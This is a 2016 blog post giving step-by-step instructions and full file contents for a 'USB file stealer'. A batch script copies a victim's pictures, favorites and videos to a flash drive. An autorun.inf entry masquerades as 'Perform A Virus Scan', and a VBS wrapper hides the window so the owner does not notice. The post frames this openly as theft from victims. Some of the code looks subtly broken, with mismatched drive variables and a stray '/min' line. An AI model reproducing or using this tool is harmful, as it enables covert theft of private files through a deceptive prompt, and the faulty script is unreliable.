Saturday, June 4, 2016

USB FILE STEALER





Hi guys, today am going to show you how to make a usb file stealer. This is easy to understand and if you have any question you are welcome to ask but don’t be a noob,pls!

Like any other hacking tricks and techniques, USB FILE STEALER is a simple hacking file which helps us to steal files using our flash drive without the permission of the file owner (victim), this technique is simple, we don’t need to download anything. All we need for making this file is a notepad and then all we have to do is insert our usb and wait a few minutes until it does its magic ( the files are transferred with less suspicious and non-windows appearing in the victims PC). So let’s start right away.


FIRST STEP: IS TO COPY THE TEXTS BELOW AND SAVE IT AS FILE.BAT
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
Cls


SECOND STEP: IS TO COPY THE TEXTS BELOW AND SAVE IT AS AUTORUN.INF
[autorun]
open=launch.bat
action=Perform A Virus Scan

THIRD STEP : IS TO COPY THE FOLLOWING AND SAVE IT AS INVISIVLE.VBS
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

LAST STEP (FOURTH STEP): IS TO COPY THE FOLLOWING AND PASTE IS AS LAUNCH.BAT
wscript.exe \invisible.vbs file.bat

After saving the files, it is going to look like the above pic. Start the launch.bat and the usb file stealer will do its magic.
NOTE:  after finishing the above steps save all the files in a folder (example you can name the folder ALL) in your flash drive except for the invisible.vbs file (save this file outside the folder created).
These were the simple commands needed to steal the files you want. So to start up the hacking progress all we need to do is to plug the USB (flash drive) in the victim’s PC, then a popup windows will appear on the victims computer. So on the popup windows select the option perform  a virus scan after clicking on the option then our USB file stealer will do its work and gain the files without the victims knowing he is being hacked.(note that sometimes it may not bring the window “perform a virus scan”, so you may need to launch the “launch.bat” file inside the driver by yourself.)
If you want to take a specific types of files then you can add whatever you want at the end of this text %backupcmd% "%USERPROFILE%\yourfile" "%drive%\all\yourfile” in the file.bat.

hope you enjoyed reading this!!

No comments:

Post a Comment